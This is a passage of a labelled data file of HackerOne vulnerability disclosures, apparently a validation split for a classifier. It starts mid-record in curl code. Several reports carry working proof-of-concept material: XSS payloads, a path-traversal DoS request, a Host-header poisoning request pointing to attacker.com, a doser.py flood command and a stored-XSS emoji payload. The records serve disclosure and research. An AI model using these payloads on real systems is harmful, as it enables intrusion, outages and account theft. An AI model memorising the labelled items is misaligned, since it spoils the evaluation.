CURLOPT_POST, 1L);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, otherdata);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, strlen(otherdata));\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host2.com/postotherdata\");\n curl_easy_perform(curl);\n\n curl_easy_cleanup(curl);\n\n curl_global_cleanup();\n\n return 0;\n}\n```\n\n## Supporting Material/References:\nThe bug that leads to these potential security issues is documented at https://github.com/curl/curl/issues/9507\n\n## Impact\n\nAn attacker could potentially inject data, either from stdin or from an unintended buffer. Further, without even an active attacker, this could lead to segfaults or sensitive information being exposed to an unintended recipient.", "source": "hackerone", "timestamp": "2022-11-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "235ccdaf2192da0e980e", "text": "[Improper Access Control - Generic] Permissions policies can be bypassed via Module._load and require.extensions (High) (CVE-2023-30587)\n\n[https://hackerone.com/reports/1960870](https://hackerone.com/reports/1960870)\n\nThe use of `Module._load()` and `require.extensions[\".js\"]` can bypass the policy mechanism and require modules outside of the policy.json definition for a given module.\nThis vulnerability affects all users using the experimental policy mechanism in all active release lines: 16.x, 18.x and, 20.x.\n\n## Impact\n\nPermission policies limit a project to a specific set of authorized node js built-in modules. For example a project could attempt to limit the use of child_process which could be bypassed leading to remote code execution.", "source": "hackerone", "timestamp": "2023-11-30", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "8b7ebc870483d867d2ab", "text": "[Information Exposure Through Sent Data] CVE-2022-27779: cookie for trailing dot TLD\n\nPublished Advisory: https://curl.se/docs/CVE-2022-27779.html\n\nOriginal Report: https://hackerone.com/reports/1553301\n\n## Impact\n\nThis can allow arbitrary sites to set cookies that then would get sent to a different and unrelated site or domain. (ie. conduct session fixation attacks.)", "source": "hackerone", "timestamp": "2022-06-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "5f2b69d3900326d4598d", "text": "[Unknown] [Java]: CWE-321 - Query to detect hardcoded JWT secret keys\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-05-13", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "dcf23c42d93a74a03988", "text": "[Privacy Violation] Friend Request Flow Exposes User Data\n\n## Summary:\nWhen submitting a friend request to a user, Zenly will allow access to their phone number regardless of whether the friend request is accepted or not. To obtain this information, a malicious actor only needs to know their username. \n## Steps To Reproduce:\nTo reproduce this issue, an environment that enables intercepting and decoding network requests is required. Once this environment is set up, we are able to gain visibility over network activity.\n{F1355295}\nThe vulnerability makes use of the **“Add by Username”** flow, which starts by searching a known username.\n{F1355316}\nThe interceptor that was previously set up can be used to view the requests that occurred during this search. Note that the “Add as Friend” button was never pressed, meaning a friend request was never sent.\n███████\nBy observing the response of the request that was executed on the `/UserPublicFriends` endpoint, a list of friends can be seen, although it is not displayed on the UI of the application. This list contains every friend of the user, one of them is **Bogus_CEO** (bogus CEO of Zenly, for demonstration purposes). Note that the response also contains their username, which could in turn be used to repeat this process and obtain their friends' list instead.\nOnce we obtain the username of the target user, we can obtain their phone number through a flow that is almost identical. On the **“Add by Username”** view, we search for their username and complete the flow by tapping the **ADD AS FRIEND** button.\n{F1355328}\nThis friend invitation will trigger a request to the `/FriendRequestCreate` endpoint, whose response contains specific information regarding both our user (items 3, 5, and 6 in the image below) and the target user (items 4, 7, and 8 in the image below).\n████████\nNote that the response contains both our phone number and the phone number of the target user, even though our friend request **was never accepted by the target user**.\n\n## Impact\n\nExposure of user data can be used by attackers for malicious purposes. Obtaining this data can put at risk not only the users of the application but also Zenly’s brand image.\nConsider a scenario where a malicious actor wants to attack a company by targeting its CEO. An attacker can make use of this vulnerability and employ the following attack vector:\n1. Search the web for an employee of the company and try to obtain their social media handle e.g., Twitter. (Best targets are employees who work in communications or marketing fields since they are typically more exposed and represent easier targets)\n2. Validate their handle is valid on Zenly.\n3. Access their list of friends through Zenly, obtain the handle of the CEO.\n4. Retrieve the phone number of the CEO through their username. <- This is already a privacy violation, but the scenario can go on...\n5. Carry out a spear-phishing attack, using the phone number of the CEO.\nAn attacker can also repeat these steps to obtain the phone number of other employees and thus prepare a more credible attack.\nNote that, according to the documentation provided by Zenly, present at [this link][1], it should not be possible to retrieve the phone number of a user unless we are already friends with them.\nThe following screenshot was obtained from this documentation:\n{F1355287}\n\n[1]: https://community.zen.ly/hc/en-us/articles/360001404288-View-or-call-my-Zenly-friend-s-phone-number", "source": "hackerone", "timestamp": "2022-01-12", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "bddf25519abb854daa5b", "text": "[Improper Input Validation] CVE-2022-27780: percent-encoded path separator in URL host\n\nAdvisory: https://curl.se/docs/CVE-2022-27780.html\n\nOriginal Report: https://hackerone.com/reports/1553841\n\n## Impact\n\nURL filter bypasses", "source": "hackerone", "timestamp": "2022-06-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ee86393506e3a1520694", "text": "[Improper Access Control - Generic] CVE-2023-42780: Apache Airflow: Improper access control vulnerability in the \"List dag warnings\" feature\n\nApache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.\n\n# Steps to reproduce :\n1. Here I create a role with very little permission. It only has read permissions for the DAG \"example_setup_teardown_taskflow\" and read warning permissions.\n2. Assign the role to an account and log in.\n3. Use burpsuite to send the following message, and you can see the warnings of other DAGs. (replaced with the session of the account)\n```\nGET /api/v1/dagWarnings HTTP/1.1\nHost: testvul.com:8080\nAccept: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\ncontent-type: application/json\nReferer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nCookie: session=6ba0ebcd-94b6-41e9-8143-2ada52d554b1.IGPZy1m5c8235p5r8qo4GhPl_YM\nConnection: close\nContent-Length: 0\n\n\n```\n{F2771429}\n\n**Security Advisory**: https://lists.apache.org/thread/h5tvsvov8j55wojt5sojdprs05oby34d\n**Severity**: Low\n**Credit**: balis0ng\n\n## Impact\n\nIt allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.", "source": "hackerone", "timestamp": "2023-11-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "2f142a9631ed939217cf", "text": "[Uncontrolled Resource Consumption] [CVE-2023-22796] Possible ReDoS based DoS vulnerability in Active Support’s underscore\n\nI reported at https://hackerone.com/reports/1681972\n\nhttps://discuss.rubyonrails.org/t/cve-2023-22796-possible-redos-based-dos-vulnerability-in-active-supports-underscore/82116\n> A specially crafted string passed to the underscore method can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability.\n> This affects String#underscore, ActiveSupport::Inflector.underscore, String#titleize, and any other methods using these.\n> All users running an affected release should either upgrade or use one of the workarounds immediately.\n\n## Impact\n\nReDoS when `.underscore` uses user input.\nAlso, `titleize`, `tableize`, and `foreign_key` using `.underscore` will also have the same problem.", "source": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e8639d3f0d77864b09e3", "text": "[Insecure Storage of Sensitive Information] password field autocomplete enabled\n\n## Summary:\n[Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.\nThe stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.]\n\n## Platform(s) Affected:\n[both]\n\n## Steps To Reproduce:\n[follow the steps]\n\n 1. [signup with the new details]\n 1. [go to login page]\n 1. [there we will see password details are automatically filled]\n\n## Supporting Material/References:\n[none]\n\n## Impact\n\nThis autocomplete password can be sniffed without user permission", "source": "hackerone", "timestamp": "2022-09-27", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "f339f122ac945545d74f", "text": "[Unknown] (CVE-2023-32003) fs.mkdtemp() and fs.mkdtempSync() are missing getValidatedPath() checks\n\nhttps://hackerone.com/reports/2037887\n\nhttps://nodejs.org/en/blog/vulnerability/august-2023-security-releases#fsmkdtemp-and-fsmkdtempsync-are-missing-getvalidatedpath-checks-lowcve-2023-32003\n\nPatch was provided.\n\n## Impact\n\nSee reports", "source": "hackerone", "timestamp": "2023-10-07", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "cd1cfaf72e8ef66cdbf2", "text": "[Violation of Secure Design Principles] Phishing/Malware site blocking on Brave iOS can be bypassed with trailing dot in hostname\n\n## Summary:\n\nPhishing/Malware site blocking feature on Brave iOS blocks navigation to the domains in [simple_malware.txt](https://github.com/brave/brave-ios/blob/821785db8fc71fd084a8a0b2600ff43ea7165ce9/Client/WebFilters/SafeBrowsing/Lists/simple_malware.txt).\nBut that logic doesn't care existence of a trailing dot in the hostname, so http://3e1.cn/ in the list is correctly blocked but [http://3e1.cn./](http://3e1.cn./) is not blocked.\n\nSafe browsing in Brave for PC/Mac (Chromium based) can blocks both URLs, so Brave iOS should align with it.\n\n## Products affected: \n\n* Brave iOS nightly build\n\n## Steps To Reproduce:\n\n* Enable \"Blocking Phishing and Malware\" feature on Setting\n* Open [http://3e1.cn./](http://3e1.cn./)\n\n## Supporting Material/References:\n\n * See attached demonstration movie file\n\n## Impact\n\nUser is taken to the prohibited malware/phishing site with bypassing Brave Shield protection.", "source": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "63251fecbf1830311338", "text": "Electrolink FM/DAB/TV Transmitter Unauthenticated Remote DoS\n\nSeverity: high", "source": "zeroscience", "timestamp": "2023-09-30", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "e19cc5c0c8e026794870", "text": "[Cross-Site Request Forgery (CSRF)] Improper CSRF token validation allows attackers to access victim's accounts linked to Hackerone\n\n### Overview:\n\nOrganisations in Hackerone can automate their workflow by integrating their accounts with their existing tools like Github or Jira. Most of these integrations are built on top of Tray.io's embedded product.\n\nAccording to this [article](https://tray.io/customers/story/hackerone). Hackerone has established Tray Embedded as central integration hub to deliver high-quality customer integration.\n\n### Flawed Authorization flow\n\nI have created two sandbox Hackerone accounts and picked the github integration for testing. This [link](https://docs.hackerone.com/programs/github-integration.html) explains very well how to setup the integration on your account.\n\nWhen we click on \"New Authentication\", an exchange starts between Hackeron's integration authentication server and the service provider. \n\n{F1976245}\n\nThe authentication integration server is ```hackerone.integration-authentication.com```. The following are steps of the authorization flow:\n\n1. The flow starts with a POST request to\n```hackerone.integration-authentication.com/session```\n\n {F1976252}\n\nThe response contains two tokens: ***session*** and ***csrf***. \n\n2. The frontend takes those values and uses them to send a request to the oauth2 endpoint to generate the authorization link.\n\n```\nhttps://hackerone.integration-authentication.com/oauth2/auth/:authentication_id?csrf=QDXo8g3vciWTiV9Mm1L-VpYl6hKQCE-4ORmMFliZNh8=&scope=read:org%20repo&session=78NgOnCMPISn0LPw4Zto5HFSRLJwJyLaJqqi6_bFmXU=\n```\n\n {F1976253}\n\n3. Following the redirection takes us to the authorization page of the service provider\n\n {F1976255}\n\nIf we choose to Authorize Hackerone, we will get redirected to the token callback endpoint:\n```\nhackerone.integration-authentication.com/oauth2/token?code=47b070b577c905d66124&state=507dad3e-aa80-4fee-8ec1-a04ad95aea83%2CQDXo8g3vciWTiV9Mm1L-VpYl6hKQCE-4ORmMFliZNh8%3D%2C%2Chackerone.integration-configuration.com%2Cproduction%2C78NgOnCMPISn0LPw4Zto5HFSRLJwJyLaJqqi6_bFmXU%3D\n```\n \n\nThis endpoint validates the code received from Github, the backend relies on the ***state*** parameter to determine to which user should the Github access token be appropriated. Then it redirects us to the callback endpoint ```https://hackerone.integration-configuration.com/auth/cb?id=507dad3e-aa80-4fee-8ec1-a04ad95aea83``` which sends a postmessage to the embedded iframe to validate the integration on the client side.\n\nBy analyzing these requests, I found that step 2 was not well protected against cross site forgery attacks. The unproper validation of the CSRF token puts all Hackerone's customers at a big risk. With one click from the victim, the attacker couldtrick the victim to link their Github(or any other integration built on top of Tray.io) to the attacker's account.\n\n### POC:\n{F1976267}\n\n\n### Reproduction Steps:\n. Attacker creates a program then starts setting up a an integration(for example Github)\n\n. Attacker keeps forwarding requests until a GET request similar to\n\n```\nhttps://hackerone.integration-authentication.com/oauth2/auth/?csrf=F_Sr5vd7hWMLSkZoubYOTMbwROI922ZU6q1S4fEF43E=&scope=read:org%20repo&session=1iydW3sIKpyTGxhG8lxeWY9ddzaUknoUJT9Rr51ptMc=\n```\n\n. Attacker copies the request's url then drops it. He then sends it to the victim and hopes for the best\n\n. Victim clicks on the link\n\nTwo options:\n1. if the victim has already linked the company's Github to the Hackerone. Github won't ask for user's conscent. The victim would be redirected the callback endpoint\n\n```\nhttps://hackerone.integration-configuration.com/auth/cb?id=\n```\n\nThe victim would have no idea of what happened\n\n2. The app would ask the user if they'd give their conscent to Hackerone. If the victim trusts Hackerone, there is a high chance they would click Yes.\n\n. Once the victim's authorization is finished. The attacker can change the location of authentication window to \n\n```\nhttps://hackerone.integration-configuration.com/auth/cb?id=\n```\n\nThi", "source": "hackerone", "timestamp": "2023-06-19", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "201e7220ff84d835958f", "text": "[Business Logic Errors] Host Header Injection on https://███/████████/Account/ForgotPassword\n\nDear DoD Team,\n\nI found one high bug on your another domain. This is from Hack US Program. Affected domain is https://█████/\n\nAn attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.\nVery often multiple websites are hosted on the same IP address. This is where the Host Header comes in. This header specifies which website should process the HTTP request. The web server uses the value of this header to dispatch the request to the specified website. Each website hosted on the same IP address is called a virtual host. And It's possible to send requests with arbitrary Host Headers to the first virtual host.\n\nHere's the PoC btw:\n\n███\n\nThank you DoD!\n\n## Impact\n\nTampering of Host header can lead to the following attacks:\n1) Web Cache Poisoning-Manipulating caching systems into storing a page generated with a malicious Host and serving it to others.\n2) Password Reset Poisoning-Exploiting password reset emails and tricking them to deliver poisoned content directly to the target.\n3) Cross Site Scripting - XSS can be performed, if the value of Host header is used for writing links without HTML-encoding. For example Joomla used to write Host header to every page without HTML Encoding like this: which led to cross site scripting.\n4) Access to internal hosts-To access internal hosts.\n5.) It can also lead to Phishing Attacks.\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\nUsers are affected\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Go to this domain: https://███/████████/\n2. Go to vendor login.\n3. Create a test account.\n4. Go to Forgot Password Reset: https://████/██████/Account/ForgotPassword\n5. Before inserting your email. \n6. Turn your foxy proxy on.\n7. Open your burp suite and go to http history tab.\n8. Now insert your email.\n9. In http history in burp you will see this request:\n\n```javascript\nPOST /████████/Account/ForgotPassword HTTP/1.1\nHost: ███\nCookie: .AspNetCore.Antiforgery.wZhPOrJ1UhI=; TS014b77bb=; ASP.NET_SessionId=; TS0144f203=; CSRF-TOKEN=\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: hr,hr-HR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nX-Csrf-Token: \nX-Requested-With: XMLHttpRequest\nContent-Length: 35\nOrigin: https://███████\nReferer: https://████/█████████/Account/ForgotPassword\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"Email\":\"███████\"}\n```\n10. Send this request to repeater tab.\n11. Change Host headet to attacker.com\n12. It shoud look like this:\n\n```javascript\nPOST /████████/Account/ForgotPassword HTTP/1.1\nHost: attacker.com\nCookie: .AspNetCore.Antiforgery.wZhPOrJ1UhI=; TS014b77bb=; ASP.NET_SessionId=; TS0144f203=; CSRF-TOKEN=\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: hr,hr-HR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nX-Csrf-Token: \nX-Requested-With: XMLHttpRequest\nContent-Length: 35\nOrigin: https://████\nReferer: https://███████/████/Account/ForgotPassword\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n```\n13. Now send request and you will get 200 OK response.\n14. Go to your mail/gmail.\n15. You will see some magic.\n16. PoC is down there.\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-10-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "fd3c060fa9fe64a40097", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS at https://██████/██████████ via \"████████\" parameter\n\nThere is Reflected Cross site scripting issue at the following url:\n\n[https://█████/████](https://██████████/██████████)\nProof Of Concept\n\nhttps://████████/███████?text=&███=%22%3E%3Csvg/onload=alert(1)%3E████\n\n███████\n\n\nBest Regards\n@pelegn\n\n## Impact\n\nCookies Exfiltration\nSOAP Bypass\nCORS Bypass\nExecuting javascript on the victim behalf\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nNavigate to https://█████████/███?text=&███████=%22%3E%3Csvg/onload=alert(1)%3E██████\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-02-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ee7e6c8d19b24af0454e", "text": "[Uncontrolled Resource Consumption] WordPress application vulnerable to DoS attack via wp-cron.php\n\n**Description:**\nHi team,\n\nThe WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.\n\nAn attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.\n\nI found this vulnerability at https://████████ endpoint.\n\n## References\n\nhttps://developer.wordpress.org/plugins/cron/\n\n## Impact\n\nA successful attack on this vulnerability can result in the following consequences:\n\n - Denial of Service (DoS) attacks, rendering the application unavailable.\n - Server overload and increased resource usage, leading to slow response times or application crashes.\n - Potential data loss and downtime.\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Get the doser.py script at https://github.com/Quitten/doser.py\n2. Use this command to run the script:\n```\npython3 doser.py -t 999 -g 'https://█████/wp-cron.php'\n```\n3. Go to https://████ after 1000 requests of the doser.py script.\n4. The site returns code 502.\n5. See the video PoC.\n\n## Suggested Mitigation/Remediation Actions\nTo mitigate this vulnerability, it is recommended to disable the default WordPress wp-cron.php script and set up a server-side cron job instead.\nHere are the steps to disable the default wp-cron.php script and set up a server-side cron job:\n\n 1. Access your website's root directory via FTP or cPanel File Manager.\n 2. Locate the wp-config.php file and open it for editing.\n 3. Add the following line of code to the file, just before the line that says \"That's all, stop editing! Happy publishing.\":\n```\ndefine('DISABLE_WP_CRON', true);\n```\n 4. Save the changes to the wp-config.php file.\n 5. Set up a server-side cron job to run the wp-cron.php script at the desired interval. This can be done using the server's control panel or by editing the server's crontab file.", "source": "hackerone", "timestamp": "2023-04-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d075c244d65323976ab6", "text": "[Cross-site Scripting (XSS) - Stored] Authenticated path traversal to Stored XSS and Denial-of-Service\n\n# Denial-of-Service\nThe vulnerabiity lies on the line `552` of `acp_icons.php`file, when importing emoji from a file we can tell phpBB which file to import from via the paramter `pak`, without any sanitization, the `pak` paramter gets passed dirrectly to `file` the file function, which attemp to read the content of the file to an array.\n{F2705838}\nBecause of the check, reading files like /etc/passwd would not be possible, but if we try to read files like /proc/self/fd/1, the request will hang, a TCP connection will be kept open, the will bring lots of burden to the server. More over, in the case when phpBB is behind a proxy, which may process concurrent request one by one, in this case, if the previous request has not finished, the the rest of requests will have to wait for it to timeout, causing a Denial-of-Service\n\nIn the progress of testing, i use the default HTTP server of PHP, which simulate exactly what a one-by-one request processing proxy would do.\nRequest:\n```\nPOST /adm/index.php?i=acp_icons&mode=smilies¤t=delete HTTP/1.1\nHost: 127.0.0.1:8082\nsec-ch-ua: \"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nContent-Type: application/x-www-form-urlencoded\nReferer: http://127.0.0.1:8082/adm/index.php?i=acp_icons&mode=smilies\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: csrftoken=Ky6rB5uThxl3PwYd6EScmT9WXYiH6rGe; sessionid=hmrhwwo5hj5abu4kqgln2let1x9zudbr; phpbb3_83bmg_u=2; phpbb3_83bmg_k=zalvonnyh1lr16og; phpbb3_83bmg_sid=3ba797a8668f6db1639ac6939d91f96e\nConnection: close\nContent-Length: 137\n\naction=import&pak=../../../../../../../../../proc/self/fd/1&form_token=b2655d5f0c9edb201328b799a61777b26cef16a5&creation_time=1694960302\n```\nResult timed-out and no response received:\n{F2705858}\n\nThis vulnerability can also help an authenticated attacker know which file exist on server by observe the response message, if the file is not found, the error from `$user->lang['PAK_FILE_NOT_READABLE']` would trigger and result in different message than `$user->lang['WRONG_PAK_TYPE']`(when the file exist but has invalid format)\n# Stored XSS\nWhen testing the emoji import, i also observe that the `SMILEY_IMG` isn't sanitized or escaped\n{F2705870} \nSo we can import a malicious emoji file containing the XSS payload, everyone who access the sites (posting section, comment section, admin section, ...) that emoji presents will trigger the XSS payload, leading to web defacement, cookie stealing, malware attack, ... \n```\n'icon_e_biggrin.gif', '15', '17', '1', 'Very Happy', ':D',\n'icon_e_biggrin.gif', '15', '17', '1', 'Very Happy', ':-D',\n'icon_e_biggrin.gif', '15', '17', '1', 'Very Happy', ':grin:',\n'icon_e_smile.gif', '15', '17', '1', 'Smile', ':)',\n'icon_e_smile.gif', '15', '17', '1', 'Smile', ':-)',\n'icon_e_smile.gif', '15', '17', '1', 'Smile', ':smile:',\n'icon_e_wink.gif', '15', '17', '1', 'Wink', ';)',\n'icon_e_wink.gif', '15', '17', '1', 'Wink', ';-)',\n'icon_e_wink.gif', '15', '17', '1', 'Wink', ':wink:',\n'icon_e_sad.gif', '15', '17', '1', 'Sad', ':(',\n'icon_e_sad.gif', '15', '17', '1', 'Sad', ':-(',\n'icon_e_sad.gif', '15', '17', '1', 'Sad', ':sad:',\n'icon_e_surprised.gif', '15', '17', '1', 'Surprised', ':o',\n'icon_e_surprised.gif', '15', '17', '1', 'Surprised', ':-o',\n'icon_e_surprised.gif', '15', '17', '1', 'Surprised', ':eek:',\n'icon_eek.gif', '15', '17', '1', 'Shocked', ':shock:',\n'icon_e_confused.gif', '15', '17', '1', 'Confused', ':?',\n'icon_e_confused.gif', '15', '17', '1', 'Confused', ':-?',\n'icon_e_confused.gif', '15', '17', '1', 'Confused', ':???:',\n'\"onmouseover=al", "source": "hackerone", "timestamp": "2023-10-29", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "8ddeeaee97b240ac8f2c", "text": "[Improper Certificate Validation] Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)\n\nInternally libssl in OpenSSL calls X509_verify_cert() on the client side to\nverify a certificate supplied by a server. That function may return a negative\nreturn value to indicate an internal error (for example out of memory). Such a\nnegative return value is mishandled by OpenSSL and will cause an IO function\n(such as SSL_connect() or SSL_do_handshake()) to not indicate success and a\nsubsequent call to SSL_get_error() to return the value\nSSL_ERROR_WANT_RETRY_VERIFY. This return value is only supposed to be returned\nby OpenSSL if the application has previously called\nSSL_CTX_set_cert_verify_callback(). Since most applications do not do this the\nSSL_ERROR_WANT_RETRY_VERIFY return value from SSL_get_error() will be totally\nunexpected and applications may not behave correctly as a result. The exact\nbehaviour will depend on the application but it could result in crashes,\ninfinite loops or other similar incorrect responses.\n\nThis issue is made more serious in combination with a separate bug in OpenSSL\n3.0 that will cause X509_verify_cert() to indicate an internal error when\nprocessing a certificate chain. This will occur where a certificate does not\ninclude the Subject Alternative Name extension but where a Certificate Authority\nhas enforced name constraints. This issue can occur even with valid chains.\n\n## Impact\n\nBy combining the two issues an attacker could induce incorrect, application\ndependent behaviour.\n\nOpenSSL 3.0.0 SSL/TLS clients are affected by this issue.", "source": "hackerone", "timestamp": "2022-01-20", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "9bea22eddf29c0cf8e76", "text": "[Authentication Bypass by Primary Weakness] CVE-2023-27535: FTP too eager connection reuse\n\n## Summary:\nlibcurl FTP(S) protocol will reuse connection even if different `CURLOPT_FTP_ACCOUNT` (libcurl) or `--ftp-account` (curl) is specified for different connections and the server requests account authentication via reply code `332`. It appears that `STRING_FTP_ALTERNATIVE_TO_USER ` (libcurl) or `--ftp-alternative-to-user` (curl) is also affected and should also result in caching being refused.\n\n## Steps To Reproduce:\n\n 1. terminal 1: `echo -e \"foo\\n\" | nc -v -l -p 9998; echo -e \"bar\\n\" | nc -v -l -p 9998`\n 2. terminal 2: `echo -ne \"220 a\\n331 b\\n332 c\\n230 d\\n257 \\\"/\\\"\\n229 (|||9998|)\\n200 e\\n213 4\\n150 f\\n226 g\\n229 (|||9998|)\\n213 4\\n150 f\\n226 g\\n\" | nc -v -l -p 9999`\n 3. terminal 3: `curl -v --ftp-account alice \"ftp://ftp@server:9999/file1\" -: --ftp-account bob \"ftp://ftp@server:9999/file2\"`\n\nAs a result connection authenticated as user `alice` will be used when fetching `file2` regardless that user `bob` was specified for fetching it.\n\n## Remediation\n* Don't reuse connection if `CURLOPT_FTP_ACCOUNT` or `STRING_FTP_ALTERNATIVE_TO_USER` are different.\n\n## Supporting Material/References:\n* https://www.ietf.org/rfc/rfc0959.txt\n\n## Impact\n\nAccessing content with wrong cached credentials.", "source": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ec1a94ef5a57d9ae01f5", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS at https://██████/\n\n**Description:**\nThere exists a reflected XSS within the logout functionality of ServiceNow. This enables an unauthenticated remote attacker to execute arbitrary JavaScript.\n\n## References\n* https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793\n\n## Impact\n\nSteal cookies to account takeover.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2022-38463\n\n## Steps to Reproduce\n1.Go to https://████/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n2.You will see alert box like this.\n███████\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2023-09-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "2d6f93b7cec9a4586a8e", "text": "[Use After Free] UAF on JSEthereumProvider\n\nThere is a UAF (Use After Free) vulnerability in the renderer implementation of the Ethereum wallet.\n\nWhen the Ethereum wallet is connected, every V8 render gets this piece of code installed, creating a new object ethereum accessible from V8. You can find the code here: https://github.com/brave/brave-core/blob/45c6649a124dd8d0ffb19ca6f7047bebb6e6da2c/components/brave_wallet/renderer/js_ethereum_provider.cc#L163-L164\n\nI will highlight some parts of the JSEthereumProvider::Install function that show the bug:\n\n```cpp\n// 1. Create a new handle to JSEthereumProvider and convert it to a v8::Object\ngin::Handle provider =\n gin::CreateHandle(isolate, new JSEthereumProvider(render_frame));\nif (provider.IsEmpty()) {\n return;\n}\nv8::Local provider_value = provider.ToV8();\nv8::Local provider_object =\n provider_value->ToObject(context).ToLocalChecked();\n\n// 2. Create a v8::Proxy for the provider\nif (!v8::Proxy::New(context, provider_object, ethereum_proxy_handler_obj)\n .ToLocal(ðereum_proxy)) {\n // Error handling\n}\n\n// 3. Expose it through window.ethereum\nglobal\n ->Set(context, gin::StringToSymbol(isolate, kEthereum), ethereum_proxy)\n .Check();\n\n// 4. Create a new v8::Object and make it accessible through ethereum._metamask\nv8::Local metamask_obj = v8::Object::New(isolate);\nprovider_object\n ->Set(context, gin::StringToSymbol(isolate, kMetaMask), metamask_obj)\n .Check();\n\n// 5. [BUG] Set a new property called `IsUnlocked`, creating a new callback object bound to `base::Unretained(provider.get())`, making the wrong assumption that ethereum._metamask can never outlive ethereum\nprovider_object\n ->Set(context, gin::StringToSymbol(isolate, kIsUnlocked),\n gin::CreateFunctionTemplate(\n isolate, base::BindRepeating(&JSEthereumProvider::IsUnlocked,\n base::Unretained(provider.get())))\n ->GetFunction(context)\n .ToLocalChecked())\n .Check();\n```\nThe bug can be triggered through JavaScript with the following steps:\n\n1. Get a reference to ethereum._metamask.\n2. 